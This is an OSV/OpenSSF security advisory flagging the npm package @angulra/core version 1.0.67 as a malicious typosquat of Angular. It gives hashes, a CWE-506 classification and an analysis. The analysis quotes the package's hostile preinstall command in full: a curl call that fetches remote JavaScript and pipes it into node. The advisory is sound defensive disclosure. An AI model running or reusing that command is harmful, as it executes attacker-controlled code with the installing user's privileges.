MAL-2026-17496

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@angulra/core/MAL-2026-17496.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-17496
Published
2026-10-04T23:18:17Z
Modified
2026-10-04T23:45:18Z
Summary
Malicious code in @angulra/core (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (7ebb04f93b463536e56e0160e0e1fc2748d69c9eb15f991e990365cee7852a34)

The package.json preinstall script runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching JavaScript from an unrelated third-party host (gitflic.ru, proxied via web.archive.org) and piping it directly into node at npm install time. The fetch is unpinned, has no integrity or signature check, and the source is attacker-controlled and mutable. The scoped name @angulra/core resembles Angular ecosystem names while the package description (Core Libs) and dependency set (mysql, pg, redis, knox, amqp) are inconsistent with any coherent library purpose, consistent with a typosquat lure. Any environment running npm install on this package executes arbitrary remote code with the installing user's privileges.

Database specific
{
    "malicious-packages-origins":  [
        {
            "id":  "IN-MAL-2026-020910",
            "import_time":  "2026-10-04T23:40:41.043648329Z",
            "modified_time":  "2026-10-04T23:18:17Z",
            "sha256":  "7ebb04f93b463536e56e0160e0e1fc2748d69c9eb15f991e990365cee7852a34",
            "source":  "amazon-inspector",
            "versions":  [
                "1.0.67"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / @angulra/core

Package

Name
@angulra/core
View open source insights on deps.dev
Purl
pkg:npm/%40angulra/core

Affected ranges

Affected versions

1.*
1.0.67

Database specific

cwes
[
    {
        "cweId":  "CWE-506",
        "description":  "The product contains code that appears to be malicious in nature.",
        "name":  "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files":  [
        {
            "path":  "package.json",
            "sha256":  "d3f10c7b4cde21b539f30b278e1990ede4854a6d01d9b6a5c2d00792ba1a792d",
            "tlsh":  "6e117b20dd8c5ea316c209f928bdc8419565081b4d94bc9cf3ea040d8f5eaaf717a55d"
        }
    ],
    "package_integrity":  [
        {
            "filename":  "core-1.0.67.tgz",
            "hashes":  {
                "sha1":  "64ddfbbf45b2e088922cd2895774fa28e602c670",
                "sha512_sri":  "sha512-sJjjB2S5i7NvgT0Nsvg7IDWQGWzhiMn50XdDCxTLD53avqIiW3sieE3XXyZY6c5wwu0hiG42VL5VVMtVUyhk5w=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@angulra/core/MAL-2026-17496.json"